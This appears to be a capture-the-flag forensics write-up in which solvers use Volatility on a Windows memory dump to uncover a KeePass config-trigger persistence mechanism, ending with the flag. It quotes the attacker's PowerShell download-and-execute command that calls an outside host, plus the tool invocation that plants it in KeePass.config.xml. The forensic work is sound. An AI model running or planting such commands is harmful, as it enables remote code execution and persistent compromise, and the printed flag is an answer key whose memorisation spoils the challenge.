Steam Door

Steam-security analysts have spotted a new unknown persistence technique used in the wild. But they are not able to understand how it works since steam-technology is involving at very fast rates. Please analyse this memory dump and find the persistence mechanism used by the malicious steam actors.
Flag format: HTB{md5sum }. For example: HTB{55e7dd3016ce4ac57b9a0f56af12f7c2}
Download: drive.google.com/file/d/1OP_r3c9Crvym28suH9K7ro5JNN0Pzx5_

Category: Forensics

Solver: lmarschk, mp455

Flag: HTB{db042f659831045cc3748324b481507e}

Writeup

Summary: Analysis of windows memory dump and file extraction out of it.

We got a memory dump steam.raw. Using volatility 2.6.1 we analyse the memory in multiple directions. For example:

  • imageinfo: Windows Profile Win7SP1x86_23418

  • pstree:

    Name                                                  Pid   PPid   Thds   Hnds Time
    -------------------------------------------------- ------ ------ ------ ------ ----
    . 0x85169698:KeePass.exe                             2756   3344     10    229 2022-03-01 12:17:23 UTC+0000
    .. 0x85b31358:powershell.exe                          188   2756     13    335 2022-03-01 12:17:34 UTC+0000
    
  • cmdline -p 188: Command line : "C:\windows\system32\Windowspowershell\v1.0\powershell.exe" -c iex (new-object net.webclient).downloadstring('https://windowsliveupdater.com/backup.ps1')

  • cmdscan:

    Cmd #0 @ 0x257f78: dir downloads
    Cmd #1 @ 0x257fa0: cd downloads
    Cmd #2 @ 0x264680: .\download.exe -t keepass -c "C:\windows\system32\Windowspowershell\v1.0\powershell.exe" -a "-c iex (new-object net.webclient).downloadstring('https://windowsliveupdater.com/backup.ps1')" -f C:\Users\steam_mngr\AppData\Roaming\KeePass\KeePass.config.xml -m add
    

This information already tells us a story. At some point in the past someone executed the download.exe with a command -c, their argument -a, a KeePass config file -f, a mode -m and a type -t. Then at the point of the memory dump KeePass was running with a powershell subprocess that is executing the mentioned argument -a. Now we can assume a story based on that: An attacker had access to this computer, downloaded the command injection tool download.exe and executed it in the KeePass mode so that the powershell command -a is injected in the KeePass.config.xml so that it is running when KeePass is running.

As we cannot find further information about the backup.ps1 let’s try to find the KeePass.config.xml. While volatilities dumpfiles plugin cannot find the file by default, the filescan plugin can.

0x000000003ef7ed58      8      0 R--r-- \Device\HarddiskVolume1\Users\steam_mngr\AppData\Roaming\KeePass\KeePass.config.xml

Having this offset dumpfiles can dump the file via dumpfiles -Q 0x000000003ef7ed58. This way we get the manipulated KeePass config file and find a section containing the powershell payload. We can now calculate the md5sum of the config file (Do not remove any of the many null bytes at the end of the file!) and get the Flag: HTB{db042f659831045cc3748324b481507e}